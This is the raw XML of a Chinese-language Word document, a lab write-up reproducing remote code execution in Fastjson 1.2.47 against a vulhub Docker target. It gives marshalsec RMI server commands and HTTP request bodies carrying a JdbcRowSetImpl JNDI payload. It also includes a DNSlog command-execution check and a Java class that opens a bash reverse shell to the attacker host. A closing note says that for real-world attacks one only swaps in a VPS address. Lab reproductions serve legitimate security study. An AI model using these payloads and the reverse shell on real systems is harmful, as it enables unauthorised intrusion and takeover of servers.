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default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Fastjson 1.2.47 远程命令执行漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>复现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"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36"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>(By Jean)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="4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1221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_Toc26138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漏洞环境</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc26138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_Toc4184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漏洞复现过程</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc4184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_Toc3742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Dnslog验证</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc3742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_Toc9401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2.1.1. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>Centos上执行操作</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc9401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_Toc22484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2.1.2. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>Kali上执行操作</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc22484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_Toc9650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2.1.3. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>Windows10上执行操作</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc9650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_Toc28731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2.1.4. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>Kali上查看结果</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc28731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_Toc30500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2.1.5. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>Windows上查看结果</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc30500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_Toc26124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反弹shell</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc26124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_Toc10458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2.2.1. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>Kali上执行操作</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc10458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_Toc8850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2.2.2. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>Windows10上执行操作</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc8850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_Toc23794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2.2.3. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>Kali上查看结果</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc23794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_Toc11625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实战说明</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc11625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_Toc6826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参考</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc6826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0" w:name="_Toc26138"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞环境</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="18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0"/>
        <w:gridCol w:w="1862"/>
        <w:gridCol w:w="1682"/>
        <w:gridCol w:w="2138"/>
        <w:gridCol w:w="1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名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1862" w:type="dxa"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr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IP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版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="169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Java环境（java -version）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攻击机</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1862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Kali（VM虚拟机、NAT模式）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192.168.96.129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Linux version 4.19.0-kali4-amd64 (devel@kali.org) (gcc version 8.3.0 (Debian 8.3.0-2)) #1 SMP Debian 4.19.28-2kali1 (2019-03-18)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version "1.8.0_191"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Java(TM) SE Runtime Environment (build 1.8.0_191-b12)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HotSpot(TM) 64-Bit Server VM (build 25.191-b12, mixed mode)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靶机</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1862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Centos7（VM虚拟机、NAT模式）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192.168.96.128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CentOS Linux release 7.6.1810 (Core) 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version "1.8.0_181"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Runtime Environment (build 1.8.0_181-b13)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64-Bit Server VM (build 25.181-b13, mixed mode)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Burpsuite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使用主机</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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Windows10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172.20.10.8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2004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version "1.8.0_211"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Java(TM) SE Runtime Environment (build 1.8.0_211-b12)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HotSpot(TM) 64-Bit Server VM (build 25.211-b12, mixed mode)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" w:name="_Toc4184"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现过程</w:t>
      </w:r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3742"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Dnslog验证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2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" w:name="_Toc9401"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Centos上执行操作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下载vulhub漏洞环境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302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clone https://github.com/vulhub/vulhub.git</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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安装docker、docker-compose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进入fastjson 1.2.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24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的目录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build &amp;&amp; docker-compose up -d启动漏洞环境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访问漏洞环境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"http://192.168.96.128:8090/"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http://192.168.96.128:8090/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67200" cy="1968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" w:name="_Toc22484"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Kali上执行操作</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/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1、安装maven(可百度教程)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</w:rPr>
        <w:t>git clone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774C9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774C9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</w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://github.com/mbechler/marshalsec.git"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774C9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i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="2774C9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</w:rPr>
        <w:t>https://github.com/mbechler/marshalsec.git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774C9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</w:rPr>
        <w:t>cd marshalsec/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</w:rPr>
        <w:t>编译项目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</w:rPr>
        <w:t>mvn clean package -DskipTests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  <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">   （需要很久）</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2071370"/>
            <wp:effectExtent l="0" t="0" r="38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21635"/>
            <wp:effectExtent l="0" t="0" r="889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查看是否安装成功：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4730750" cy="933450"/>
            <wp:effectExtent l="0" t="0" r="635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bookmarkStart w:id="14" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="14"/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2、开启RMI服务</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.96.129:8888/#dnslog" 9999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135" cy="349250"/>
            <wp:effectExtent l="0" t="0" r="1206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3、开启Web服务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u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF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u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t xml:space="preserve">python -m SimpleHTTPServer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u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>8888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u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3136900" cy="3873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9650"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Windows10上执行操作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使用burpsuite请求：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 HTTP/1.1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192.168.96.128:8090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x64; rv:81.0) Gecko/20100101 Firefox/81.0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text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8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zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2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Upgrade-Insecure-Requests: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max-age=0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167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"b":{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"@type":"com.sun.rowset.JdbcRowSetImpl",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"dataSourceName":"rmi://192.168.96.129:9999/dnslog",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"autoCommit":true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_Toc28731"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Kali上查看结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6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4707255"/>
            <wp:effectExtent l="0" t="0" r="1143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0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bookmarkStart w:id="7" w:name="_Toc30500"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Windows上查看结果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发现成功执行命令（ping user.`whoami`.gl637w.dnslog.cn"）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="2776855"/>
            <wp:effectExtent l="0" t="0" r="1079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rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc26124"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>反弹shell</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc10458"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Kali上执行操作</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9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新建文件getshell.java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javac TouchFile.java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java.lang.Runtime;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java.lang.Process;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TouchFile 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 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Runtime rt = Runtime.getRuntime();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String[] commands = {"/bin/bash","-c","bash -i &gt;&amp; /dev/tcp/192.168.96.129/4444 0&gt;&amp;1"};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pc = rt.exec(commands);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pc.waitFor();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 catch (Exception e) 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do nothing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编译getshell.java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Javac getshell.java，得到getshell.class文件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启动web服务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u w:val="none"/>
          <w:shd w:val="clear" w:fill="FFFFFF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u w:val="none"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t xml:space="preserve">python -m SimpleHTTPServer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u w:val="none"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>8888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启动RMI服务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-cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.96.129:8888/#getshell" 9999</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="26028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bookmarkStart w:id="10" w:name="_Toc8850"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Windows10上执行操作</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10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 HTTP/1.1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192.168.96.128:8090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*/*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en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(compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)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"b":{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"@type":"com.sun.rowset.JdbcRowSetImpl",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"dataSourceName":"rmi://192.168.96.129:7777/getshell",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"autoCommit":true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1" w:name="_Toc23794"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Kali上查看结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11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成功反弹shell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411220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bookmarkStart w:id="12" w:name="_Toc11625"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>实战说明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如果是在实战环境，只需将其中的攻击ip信息，换成VPS即可。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc6826"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13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"https://www.freebuf.com/articles/web/242712.html"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https://www.freebuf.com/articles/web/242712.html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B8DB11"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="A7B8DB11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A99E5CE1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A99E5CE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22BF36C2"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="22BF36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FA60C3B"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="2FA60C3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F7B5A6D"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="7F7B5A6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0A15A6"/>
    <w:rsid w:val="013D3023"/>
    <w:rsid w:val="02F271E3"/>
    <w:rsid w:val="052C561D"/>
    <w:rsid w:val="06110B35"/>
    <w:rsid w:val="08854F49"/>
    <w:rsid w:val="09D6392C"/>
    <w:rsid w:val="0B3E5651"/>
    <w:rsid w:val="10DE70B9"/>
    <w:rsid w:val="10F37C66"/>
    <w:rsid w:val="13A121C7"/>
    <w:rsid w:val="156B3ABB"/>
    <w:rsid w:val="179D7147"/>
    <w:rsid w:val="182D3319"/>
    <w:rsid w:val="187A02A8"/>
    <w:rsid w:val="1E875C1D"/>
    <w:rsid w:val="1EB06723"/>
    <w:rsid w:val="20490317"/>
    <w:rsid w:val="209D3F8F"/>
    <w:rsid w:val="20D45D2F"/>
    <w:rsid w:val="230B0F96"/>
    <w:rsid w:val="24887156"/>
    <w:rsid w:val="264E5F31"/>
    <w:rsid w:val="26542E30"/>
    <w:rsid w:val="293571F1"/>
    <w:rsid w:val="2A215AA2"/>
    <w:rsid w:val="2D356A0D"/>
    <w:rsid w:val="2DAC1A8E"/>
    <w:rsid w:val="2EC33EB6"/>
    <w:rsid w:val="31D27515"/>
    <w:rsid w:val="31FF0B49"/>
    <w:rsid w:val="33641FCC"/>
    <w:rsid w:val="33A174D9"/>
    <w:rsid w:val="3844332F"/>
    <w:rsid w:val="3C832E77"/>
    <w:rsid w:val="3C952079"/>
    <w:rsid w:val="3E832C76"/>
    <w:rsid w:val="3EA17630"/>
    <w:rsid w:val="3F467F7E"/>
    <w:rsid w:val="3FAF4739"/>
    <w:rsid w:val="40173EDE"/>
    <w:rsid w:val="43277135"/>
    <w:rsid w:val="43A1332B"/>
    <w:rsid w:val="44D55CD6"/>
    <w:rsid w:val="48E12BCD"/>
    <w:rsid w:val="490A382D"/>
    <w:rsid w:val="499F75A3"/>
    <w:rsid w:val="4CB735A8"/>
    <w:rsid w:val="4DC71695"/>
    <w:rsid w:val="4DFC33D6"/>
    <w:rsid w:val="4EF85624"/>
    <w:rsid w:val="4FC568FE"/>
    <w:rsid w:val="510E4DAA"/>
    <w:rsid w:val="531070E0"/>
    <w:rsid w:val="592D12BF"/>
    <w:rsid w:val="5A3C51E8"/>
    <w:rsid w:val="5CE00D6C"/>
    <w:rsid w:val="5F5C310E"/>
    <w:rsid w:val="5F894DA6"/>
    <w:rsid w:val="6409010D"/>
    <w:rsid w:val="66284FD4"/>
    <w:rsid w:val="6A457BB3"/>
    <w:rsid w:val="6D5F201D"/>
    <w:rsid w:val="6E511BD0"/>
    <w:rsid w:val="6FBB5D4E"/>
    <w:rsid w:val="6FC6732D"/>
    <w:rsid w:val="72F74DDE"/>
    <w:rsid w:val="740367D2"/>
    <w:rsid w:val="7B1B6982"/>
    <w:rsid w:val="7D0A15A6"/>
    <w:rsid w:val="7DCB7922"/>
    <w:rsid w:val="7EA61D58"/>
    <w:rsid w:val="7FCF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sz w:val="36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14"/>
      <w:ind w:left="575" w:hanging="575"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="28"/>
      <w:lang w:eastAsia="en-US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1"/>
      </w:numPr>
      <w:ind w:left="720" w:hanging="720"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
      <w:b/>
      <w:sz w:val="30"/>
      <w:szCs w:val="21"/>
      <w:lang w:eastAsia="en-US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toc 1"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="13">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:ind w:left="420" w:leftChars="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1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Hyperlink"/>
    <w:basedOn w:val="15"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:r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字符"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="36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2020-10-28T02:51:00Z</dcterms:created>
  <dc:creator>Administrator</dc:creator>
  <cp:lastModifiedBy>Administrator</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-10-28T05:52:41Z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